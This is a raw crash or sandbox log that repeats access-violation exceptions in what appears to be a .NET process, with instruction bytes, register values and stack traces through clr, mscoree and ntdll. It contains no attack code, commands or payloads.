RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925580
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925588
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 48315204
1 0 0

__exception__

stacktrace:
0x28abee8
0x28abd39
0x28a7145
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925292
registers.edi: 3925592
registers.eax: 0
registers.ebp: 3925604
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28ac47e
0x28abd39
0x28a7145
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925580
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925588
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 49664892
1 0 0

__exception__

stacktrace:
0x28abee8
0x28abd39
0x28a7145
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925292
registers.edi: 3925592
registers.eax: 0
registers.ebp: 3925604
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28ac47e
0x28abd39
0x28a7145
0x28a5ccc
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925580
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925588
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 51014580
1 0 0

__exception__

stacktrace:
0x28ac822
0x28ac631
0x28a712d
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925344
registers.edi: 3925644
registers.eax: 0
registers.ebp: 3925656
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28acc8a
0x28ac631
0x28a712d
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925632
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925640
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45507072
registers.ecx: 46118716
1 0 0

__exception__

stacktrace:
0x28ac822
0x28ac631
0x28a7145
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925344
registers.edi: 3925644
registers.eax: 0
registers.ebp: 3925656
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28acc8a
0x28ac631
0x28a7145
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925632
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925640
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 47609512
1 0 0

__exception__

stacktrace:
0x28ac822
0x28ac631
0x28a7145
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925344
registers.edi: 3925644
registers.eax: 0
registers.ebp: 3925656
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28acc8a
0x28ac631
0x28a7145
0x28a5de4
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925632
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925640
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 49100020
1 0 0

__exception__

stacktrace:
0x28ad0fc
0x28acf19
0x28a712d
0x28a5eea
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925376
registers.edi: 3925676
registers.eax: 0
registers.ebp: 3925688
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28ad4bc
0x28acf19
0x28a712d
0x28a5eea
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925664
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925672
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 46532156
1 0 0

__exception__

stacktrace:
0x28ad0fc
0x28acf19
0x28a7145
0x28a5eea
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 18 bb 00 01 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28a803a
registers.esp: 3925376
registers.edi: 3925676
registers.eax: 0
registers.ebp: 3925688
registers.edx: 16824572
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x28ab970
0x28ad4bc
0x28acf19
0x28a7145
0x28a5eea
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x28ab9b3
registers.esp: 3925664
registers.edi: 3925972
registers.eax: 0
registers.ebp: 3925672
registers.edx: 0
registers.ebx: 3928580
registers.esi: 45493708
registers.ecx: 48025248
1 0 0

__exception__

stacktrace:
0x28ad0fc
0x28acf19
0x28a7145
0x28a5eea
0x28a4b79
0x80d9ff
0x807855
0x806f0b
0x803c6b
0x8035d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
